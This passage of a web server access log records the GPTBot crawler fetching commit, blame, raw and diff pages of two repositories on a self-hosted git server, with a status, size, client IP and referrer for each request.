like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:16:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 12997] [Gzip 3.81] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup" -[17/Feb/2026:13:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" [Client 74.7.227.38] [Length 81787] [Gzip 50.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/database.sqlite" -[17/Feb/2026:13:16:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14646] [Gzip 4.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components" -[17/Feb/2026:13:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 14860] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:16:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/8d291f57b63b0b2be49f636657ef35169d418129" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129" -[17/Feb/2026:13:16:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 14175] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584" -[17/Feb/2026:13:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/components" [Client 74.7.227.38] [Length 10573] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html" -[17/Feb/2026:13:16:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0.diff" [Client 74.7.227.38] [Length 451614] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0" -[17/Feb/2026:13:16:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d?show-outdated=&style=unified&whitespace=show-all" [Client 74.7.227.38] [Length 15615] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d" -[17/Feb/2026:13:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" [Client 74.7.227.38] [Length 14936] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:16:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d" -[17/Feb/2026:13:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" [Client 74.7.227.38] [Length 1390] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/.Backup/update_status.py" -[17/Feb/2026:13:16:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea" -[17/Feb/2026:13:16:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 9872] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" -[17/Feb/2026:13:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 14562] [Gzip 6.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" -[17/Feb/2026:13:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" [Client 74.7.227.38] [Length 3708] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/components/Services.tsx" -[17/Feb/2026:13:16:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" [Client 74.7.227.38] [Length 7497] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746" -[17/Feb/2026:13:16:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 10253] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" [Client 74.7.227.38] [Length 7487] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a" -[17/Feb/2026:13:16:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 15077] [Gzip 3.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 12026] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6" -[17/Feb/2026:13:16:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" [Client 74.7.227.38] [Length 7489] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c" -[17/Feb/2026:13:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" [Client 74.7.227.38] [Length 7487] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d" -[17/Feb/2026:13:16:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 14809] [Gzip 4.55] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 13921] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:16:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15542] [Gzip 4.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16467] [Gzip 5.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:16:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14192] [Gzip 4.68] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components" -[17/Feb/2026:13:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 17033] [Gzip 3.30] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:16:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" [Client 74.7.227.38] [Length 9833] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/ebd2be03a23e76e126207d40a257d72f40ab9a7c/.Backup/html/assets" -[17/Feb/2026:13:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 12602] [Gzip 6.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:16:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 500] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" -[17/Feb/2026:13:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" [Client 74.7.227.38] [Length 11839] [Gzip 5.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/.gitignore" -[17/Feb/2026:13:16:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/find/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" [Client 74.7.227.38] [Length 7488] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e" -[17/Feb/2026:13:16:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:13:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 9866] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" -[17/Feb/2026:13:16:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9869] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" -[17/Feb/2026:13:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9868] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" -[17/Feb/2026:13:16:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9867] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" -[17/Feb/2026:13:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 10969] [Gzip 2.93] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:16:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 11962] [Gzip 3.36] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 14958] [Gzip 7.37] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:13:16:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15901] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" -[17/Feb/2026:13:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16910] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" -[17/Feb/2026:13:16:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14294] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" -[17/Feb/2026:13:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/find/commit/b288a964d15beae093be1af2456d67149d3aafa1" [Client 74.7.227.38] [Length 7494] [Gzip 2.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1" -[17/Feb/2026:13:16:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 4368] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/ChatBot.tsx" -[17/Feb/2026:13:16:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" [Client 74.7.227.38] [Length 3846] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Footer.tsx" -[17/Feb/2026:13:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 13780] [Gzip 5.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" -[17/Feb/2026:13:16:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" [Client 74.7.227.38] [Length 6703] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Contact.tsx" -[17/Feb/2026:13:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 9983] [Gzip 2.84] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" -[17/Feb/2026:13:16:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 11849] [Gzip 4.43] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" -[17/Feb/2026:13:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" [Client 74.7.227.38] [Length 28] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/.gitignore" -[17/Feb/2026:13:16:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" [Client 74.7.227.38] [Length 796] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/nginx.conf" -[17/Feb/2026:13:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" [Client 74.7.227.38] [Length 3639] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/Header.tsx" -[17/Feb/2026:13:16:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" [Client 74.7.227.38] [Length 2920] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/html/components/About.tsx" -[17/Feb/2026:13:16:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/8d291f57b63b0b2be49f636657ef35169d418129/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 9981] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 